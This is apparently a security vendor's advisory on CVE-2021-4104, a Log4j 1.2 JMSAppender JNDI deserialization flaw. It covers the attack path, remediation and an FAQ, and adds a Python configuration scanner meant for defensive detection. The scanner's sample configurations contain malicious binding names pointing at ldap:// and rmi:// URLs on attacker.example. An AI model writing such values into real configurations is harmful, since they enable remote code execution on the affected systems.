External risk intelligence

Log4j 1.2 configuration flaw could allow an attacker to take control of your systems.

CVE advisory

Severity: HIGH (CVSS 7.5)

CVE-2021-4104

A Log4j 1.2 configuration flaw could allow remote code execution if an attacker can modify the application's Log4j configuration, by the same JNDI lookup mechanism as CVE-2021-44228 (Log4Shell). It affects the older, unsupported Log4j 1.2 line, and only deployments that configure the JMSAppender component.

Halo Surface Signal score: 3

Deserialization

Apache Log4j

Affected versions: 1.2.x

External exposure likelihood

Halo Surface Signal score for CVE-2021-4104

The vulnerability requires a specific, non-default configuration: the JMSAppender component of Log4j 1.2 must be in use, and the attacker must be able to write to the Log4j configuration file. Log4j is common in web-facing applications, but these two preconditions make easy or intended public internet reachability less certain than for a default-exposed service.

Horizon Alert

Summary of the vulnerability and why it matters

This vulnerability in older versions of Apache Log4j allows an attacker to execute code remotely if they can write to the application's Log4j configuration. It is only reachable when the non-default JMSAppender component is configured: when the appender is activated during configuration loading, it resolves its TopicBindingName and TopicConnectionFactoryBindingName settings through JNDI, so an attacker-controlled value can point those lookups at a hostile server whose response is deserialized. Teams should pay attention because this can lead to a complete compromise of affected systems.

  • Can lead to remote code execution.
  • Requires specific, non-default configuration.
  • Affects older Log4j 1.2 versions.

Attack Path

How an attacker could exploit the issue

An attacker who gains write access to the Log4j configuration file (log4j.properties or log4j.xml) defines or edits a `JMSAppender` and sets its `TopicBindingName` or `TopicConnectionFactoryBindingName` to a JNDI name under their control, for example an LDAP or RMI URL. When the application next loads the configuration and activates the appender, Log4j performs the JNDI lookup, and the object returned by the attacker's server is deserialized, yielding remote code execution. This relies on a specific, non-default configuration; deployments that do not use `JMSAppender` are not affected by this path.

  • Attacker needs config write access.
  • Targets `JMSAppender` configuration.
  • Requires specific, non-default setup.

Live Threat

Current exploitation, exposure, and threat context

Attackers might target this vulnerability due to its potential for remote code execution, similar to the widespread Log4Shell. However, exploitation is less straightforward as it requires a specific, non-default configuration of Log4j 1.2's JMSAppender and the attacker to have write access to the configuration. This significantly limits the attack surface compared to more easily accessible vulnerabilities.

  • Requires specific configuration.
  • Attacker needs write access.
  • Log4j 1.2 is end-of-life.

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

Prioritize identifying and isolating systems that run Log4j 1.2 with a JMSAppender configured. Audit those systems for unexpected changes to log4j.properties or log4j.xml and for outbound LDAP or RMI connections from the JVM, which are the observable side effects of the JNDI lookup this vulnerability abuses. Because the impact is remote code execution via deserialization, take affected services offline if they are critical and cannot be immediately patched or mitigated.

  • Egress-filter outbound LDAP, RMI and other JNDI provider connections from application hosts (JNDI itself is an API, not a protocol that can be blocked directly).
  • Remove or disable the JMSAppender configuration; where the configuration cannot be changed, delete the `org/apache/log4j/net/JMSAppender.class` entry from the Log4j 1.2 jar so the appender cannot be instantiated.
  • Upgrade to a currently supported Log4j 2 release or another supported logging library; Log4j 1.x has been end of life since August 2015 and receives no fixes.
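As an added example (not part of this advisory or of Apache Log4j), the following Python script scans Log4j 1.2 configuration text, in both properties and XML form, for the two conditions described in the Attack Path and Operational Fix sections above: whether a `JMSAppender` is configured at all, and whether its `TopicBindingName` or `TopicConnectionFactoryBindingName` has been set to a remote JNDI URL. The sample configurations, the appender names and the `attacker.example` hosts are constructed for illustration.

```python
"""Scan Log4j 1.2 configuration text for JMSAppender and remote JNDI binding names.

Added example, not the advisory's or Apache Log4j's own code. Flags any configured
org.apache.log4j.net.JMSAppender (exposure, worth removing) and binding names that
resolve through a remote JNDI provider (the tampering pattern of an actual attack).
"""
import re
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
# The two settings JMSAppender resolves with InitialContext.lookup() when the
# appender is activated, i.e. while the configuration is being loaded.
JNDI_PARAMS = ("TopicBindingName", "TopicConnectionFactoryBindingName")
# JNDI URL schemes that fetch a (serialized) object from a remote host.
REMOTE_SCHEME = re.compile(r"^(ldaps?|rmi|dns|iiop|corbaname)://", re.IGNORECASE)


def _finding(name, params):
    """One finding: which binding names are set and which of them are remote URLs."""
    return {
        "appender": name,
        "params": params,
        "remote": [p for p in JNDI_PARAMS if p in params and REMOTE_SCHEME.match(params[p])],
    }


def scan_properties(text):
    """Findings for log4j.properties text (key=value lines; '#' or '!' comments)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!" or "=" not in line:
            continue  # comments, blanks and non key=value lines are ignored
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    findings = []
    for key, value in props.items():
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)  # appender class definition
        if m and value == JMS_APPENDER:
            prefix = f"log4j.appender.{m.group(1)}."
            params = {p: props[prefix + p] for p in JNDI_PARAMS if prefix + p in props}
            findings.append(_finding(m.group(1), params))
    return findings


def scan_xml(text):
    """Findings for log4j.xml (DOMConfigurator) text."""
    findings = []
    for app in ET.fromstring(text).iter("appender"):
        if app.get("class") != JMS_APPENDER:
            continue
        params = {p.get("name"): p.get("value", "") for p in app.findall("param")
                  if p.get("name") in JNDI_PARAMS}
        findings.append(_finding(app.get("name"), params))
    return findings


def assess(findings):
    """'tampered' if a binding name is a remote JNDI URL, 'exposed' if any
    JMSAppender is configured at all, otherwise 'clean'."""
    if any(f["remote"] for f in findings):
        return "tampered"
    return "exposed" if findings else "clean"


# Constructed sample: a JMSAppender whose binding names an attacker with write
# access to the file has pointed at a hostile LDAP server (placeholder host).
TAMPERED_PROPERTIES = """
log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://attacker.example:1389/Exploit
log4j.appender.jms.TopicBindingName=ldap://attacker.example:1389/Exploit
"""

# Constructed sample: a plausible in-house connection factory next to a topic
# name that has been swapped for an RMI URL.
TAMPERED_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE log4j:configuration SYSTEM "log4j.dtd">
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="jms" class="org.apache.log4j.net.JMSAppender">
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
    <param name="TopicBindingName" value="rmi://attacker.example:1099/Exploit"/>
  </appender>
  <root><level value="info"/><appender-ref ref="jms"/></root>
</log4j:configuration>
"""

# Constructed sample: only local JNDI names, yet still exposed, because whoever
# can edit the file can change those names at any time.
EXPOSED_XML = TAMPERED_XML.replace("rmi://attacker.example:1099/Exploit", "AuditTopic")

if __name__ == "__main__":
    for label, f in (("tampered.properties", scan_properties(TAMPERED_PROPERTIES)),
                     ("tampered.xml", scan_xml(TAMPERED_XML)),
                     ("exposed.xml", scan_xml(EXPOSED_XML))):
        print(label, assess(f), f)
```

Two caveats for anyone running this against real hosts. The scanner only sees the configuration file; an application that builds its JMSAppender in code, or sets the binding names from system properties, needs a code review instead. And a result of `exposed` is the one to act on even without a remote URL: the lookup is performed against whatever the file says at the time the configuration is loaded, so any JMSAppender definition plus write access to the file is the full precondition for the vulnerability.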

Frequently asked questions

What is Apache Log4j 1.2 and what was it used for?

Apache Log4j 1.2 is an older logging framework for Java applications. Developers used it to record events, errors, and other information generated by their software, helping with debugging and monitoring. This version reached its end of life in August 2015.

What kind of vulnerability does CVE-2021-4104 represent?

CVE-2021-4104 is a deserialization vulnerability. When Log4j 1.2 is configured to use its JMSAppender, the appender's JNDI lookups can return attacker-controlled objects, and deserializing them allows the attacker to execute arbitrary code on the affected system.

How can an attacker exploit the Log4j 1.2 vulnerability?

An attacker needs to be able to write to the Log4j configuration file. By setting the JMSAppender's binding names to JNDI names they control, they cause the application to make JNDI requests to a server of their choosing when the configuration is loaded, and the response leads to code execution. Using Log4j 1.2 without this specific JMSAppender configuration does not trigger the bug.

Who should be concerned about CVE-2021-4104?

Organizations using Log4j 1.2 with the JMSAppender configuration should be concerned. While the vulnerability is classified as external due to its network attack vector, its exploitation requires specific conditions (non-default configuration and write access to config), making it a 'Possible' risk according to the Halo Surface Signal.

What is the first step to address this Log4j 1.2 vulnerability?

The immediate first step is to identify all systems that are running Log4j 1.2 and are specifically configured to use the JMSAppender. If possible, isolate these systems. It is strongly recommended to upgrade to Log4j 2, which addresses this and other security issues.
